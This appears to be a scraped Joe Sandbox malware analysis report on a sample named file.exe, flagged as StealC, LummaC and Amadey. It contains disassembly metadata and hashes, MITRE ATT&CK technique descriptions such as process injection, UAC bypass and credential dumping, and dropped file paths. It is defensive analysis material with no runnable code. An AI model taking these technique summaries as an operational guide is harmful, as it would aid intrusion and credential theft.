API ID: Util$Equal_ErrorFindItemsTag_memcmp
String ID: '8{l
API String ID: 1521942269-3189142013
Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction ID: 17ea7673ee20c37158e09332cbcee23d4a7f461d5537c67b7b47e91f19164636
Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction Fuzzy Hash: 2BF0BB3260122467EB104E6BAE85B4736DCDB4167DF1403B1EE28EB791E771CC01D6E1

Function 6C7DAF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6C7DAF78

Part of subcall function 6C73ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C73ACE2
Part of subcall function 6C73ACC0: malloc.MOZGLUE(00000001), ref: 6C73ACEC
Part of subcall function 6C73ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C73AD02
Part of subcall function 6C73ACC0: TlsGetValue.KERNEL32 ref: 6C73AD3C
Part of subcall function 6C73ACC0: calloc.MOZGLUE(00000001,?), ref: 6C73AD8C
Part of subcall function 6C73ACC0: PR_Unlock.NSS3 ref: 6C73ADC0
Part of subcall function 6C73ACC0: PR_Unlock.NSS3 ref: 6C73AE8C
Part of subcall function 6C73ACC0: free.MOZGLUE(?), ref: 6C73AEAB

memcpy.VCRUNTIME140(6C8A3084,6C8A02AC,00000090), ref: 6C7DAF94

Strings

SSL, xrefs: 6C7DAF73

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: 05ade20024f3814c13ed9391ce92c5f47a3eb9ea9f2f2fc81a7be7d12b55fcc1
Instruction ID: fa5e3a528c5b704f3bc426bce5ec2e8058059d82d0e1b027eea1478b07fb5c88
Opcode Fuzzy Hash: 05ade20024f3814c13ed9391ce92c5f47a3eb9ea9f2f2fc81a7be7d12b55fcc1
Instruction Fuzzy Hash: AA211BB2605A489EDA20DFD2B64731BBBB5B30264EF52552CC2190BB24D731F848EFD5

Function 6C858CA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39threadCOMMON

Download Yara Rule

APIs

PR_snprintf.NSS3(?,00000028,6C878547,E436472F), ref: 6C858CD8

Part of subcall function 6C730F00: PR_GetPageSize.NSS3(6C730936,FFFFE8AE,?,6C6C16B7,00000000,?,6C730936,00000000,?,6C6C204A), ref: 6C730F1B
Part of subcall function 6C730F00: PR_NewLogModule.NSS3(clock,6C730936,FFFFE8AE,?,6C6C16B7,00000000,?,6C730936,00000000,?,6C6C204A), ref: 6C730F25

PR_GetCurrentThread.NSS3 ref: 6C858CE5

Strings

/G6/, xrefs: 6C858CA7

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CurrentModulePageR_snprintfSizeThread
String ID: /G6/
API String ID: 1660122677-570549270
Opcode ID: 0c19dea24396b9bc112b0193f833b781be86bb743ac414d090de6f629922d992
Instruction ID: 44083dc893327d88475341f1d0991afab7cc08a6b1c970e581da1b4a2505de71
Opcode Fuzzy Hash: 0c19dea24396b9bc112b0193f833b781be86bb743ac414d090de6f629922d992
Instruction Fuzzy Hash: 7AF04471A101389BC724AF7D9A447AE3AA4EB08718F41496FE8098B791D7304848C7D4

Function 6C74C810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36timeCOMMON

Download Yara Rule

APIs

CERT_CheckCertValidTimes.NSS3(?,00000000,-00000078,00000000,?,00000000,]tl,6C746499,-00000078,00000000,?,?,]tl,?,6C745DEF,?), ref: 6C74C821

Part of subcall function 6C741DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C741E0B
Part of subcall function 6C741DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C741E24

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,00000000,?,?,]tl,?,6C745DEF,?,?,?), ref: 6C74C857

Strings

]tl, xrefs: 6C74C810

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Choice_DecodeTimeUtil$CertCheckDestroyPublicTimesValid
String ID: ]tl
API String ID: 221937774-1080831252
Opcode ID: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
Instruction ID: e226002af790e01ec91c460bf613a937e85d4b77ad61931fa3f0788b06dcbbbf
Opcode Fuzzy Hash: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
Instruction Fuzzy Hash: 25F0A777A0011477EF0169666E0DAFF365DDF8115AF044031FE18D7651FB22C92987E1

Function 6C76CC10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C76CC22

Part of subcall function 6C742F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C742F0A
Part of subcall function 6C742F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C742F1D

CERT_DestroyCertList.NSS3(00000000), ref: 6C76CC44

Part of subcall function 6C742F50: CERT_DestroyCertificate.NSS3(?), ref: 6C742F65
Part of subcall function 6C742F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C742F83

Strings

/G6/, xrefs: 6C76CC18

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Arena_CertDestroyList$Alloc_ArenaCertificateFree
String ID: /G6/
API String ID: 3533527289-570549270
Opcode ID: 1014ec8581ea7e8c48b737eac1d3a00b532de5757925a339940b72016d21b098
Instruction ID: 7d35a2b46dbdcb3c2c038a9bc64a074c5b9395ec11589271c40167dba66637b4
Opcode Fuzzy Hash: 1014ec8581ea7e8c48b737eac1d3a00b532de5757925a339940b72016d21b098
Instruction Fuzzy Hash: 77F08271A0020997CB10AF7E9B089ABBBA49F8565DB418039DD18DBB00EA31D919C7E1

Function 6C730F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6C730936,FFFFE8AE,?,6C6C16B7,00000000,?,6C730936,00000000,?,6C6C204A), ref: 6C730F1B

Part of subcall function 6C731370: GetSystemInfo.KERNEL32(?,?,?,?,6C730936,?,6C730F20,6C730936,FFFFE8AE,?,6C6C16B7,00000000,?,6C730936,00000000), ref: 6C73138F

PR_NewLogModule.NSS3(clock,6C730936,FFFFE8AE,?,6C6C16B7,00000000,?,6C730936,00000000,?,6C6C204A), ref: 6C730F25

Part of subcall function 6C731110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C730936,00000001,00000040), ref: 6C731130
Part of subcall function 6C731110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C730936,00000001,00000040), ref: 6C731142
Part of subcall function 6C731110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C730936,00000001), ref: 6C731167

Strings

clock, xrefs: 6C730F20

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: 2df1482db7154d6813383ff050f93afaa183dc87adf14bf943db9d13e08e0d37
Instruction ID: 23b7aad4495f055cf02b755c3e08b7f8cd92d40cc44ac85ea0b85fefcad54e72
Opcode Fuzzy Hash: 2df1482db7154d6813383ff050f93afaa183dc87adf14bf943db9d13e08e0d37
Instruction Fuzzy Hash: ADD0123260416457C5316697AD4DBDFB7ACC7C32BDF106836E12C42E124A6C90DAE2B5

Function 6C7A0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C7A0DF5
TlsGetValue.KERNEL32 ref: 6C7A0E2D
TlsGetValue.KERNEL32 ref: 6C7A0E58
TlsGetValue.KERNEL32 ref: 6C7A0E84

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: 15f22705beb6350c425711e20646d613ea9fd97359018517bee3042cf0da0b83
Instruction ID: 347d65758fa7199b0c85250752eedbfefa96147f728249533843bdfade2ce575
Opcode Fuzzy Hash: 15f22705beb6350c425711e20646d613ea9fd97359018517bee3042cf0da0b83
Instruction Fuzzy Hash: 0D31B270649390CFDB207FBC86882597BB8BF0634DF014B79D88A87A21DB358496DB81

Function 6C7A0F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C742AF5,?,?,?,?,?,6C740A1B,00000000), ref: 6C7A0F1A
malloc.MOZGLUE(00000001), ref: 6C7A0F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C7A0F42
TlsGetValue.KERNEL32 ref: 6C7A0F5B

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: 735c4f66ec12ce9770fadb05bd3ff26c13a37fc671ae193c0d153ba963b6d127
Instruction ID: 5aa719590d59d0077b0420b3b6ec425f30d569198c3b47aac045ef760d7657f1
Opcode Fuzzy Hash: 735c4f66ec12ce9770fadb05bd3ff26c13a37fc671ae193c0d153ba963b6d127
Instruction Fuzzy Hash: 8601F0B1E402905BE7602B7E9F085567AACEF5629DF010B31EC1DD3A21D735C856C6E2

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AAKJEGCFBGDHJJJJJKJE

C:\ProgramData\BGIDBKKKKKFBGDGDHIDB

C:\ProgramData\DGHCBAAE

C:\ProgramData\DGIJECGDGCBKECAKFBGC

C:\ProgramData\FIDHCFBA

Windows Analysis Report
file.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
